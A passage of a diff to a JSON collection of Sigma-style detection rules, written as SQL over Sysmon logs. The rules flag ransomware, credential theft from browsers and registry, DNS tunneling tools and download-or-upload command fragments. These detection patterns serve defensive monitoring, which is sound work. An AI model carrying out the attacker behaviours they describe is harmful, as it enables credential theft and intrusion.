ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "status": "experimental", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "System administrator usage", + "Anti virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE 
'%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "status": "experimental", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. 
This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Non Interactive PowerShell Process Spawned", - "id": "f4bbd493-b796-416e-bbf2-121235348529", - "status": "test", - "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", - "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community 
(improvements)", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate programs executing PowerShell scripts" + "Administrative activity" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentImage LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_non_interactive_execution.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": 
"Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Change PowerShell 
Policies to an Insecure Level", - "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Suspicious ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "status": "experimental", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], 
"falsepositives": [ - "Unknown" + "False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "status": "experimental", + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Unlikely" + "Legitimate administrative scripts may use this functionality. 
Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Legitimate use when App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Use Short Name Path in Image", + "id": "a96970af-f126-420d-90e1-d37bf25e50e1", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1\\\\%' ESCAPE '\\' OR Image LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (Image LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR Image LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": 
"b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ - "Legitimate admin scripts" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE 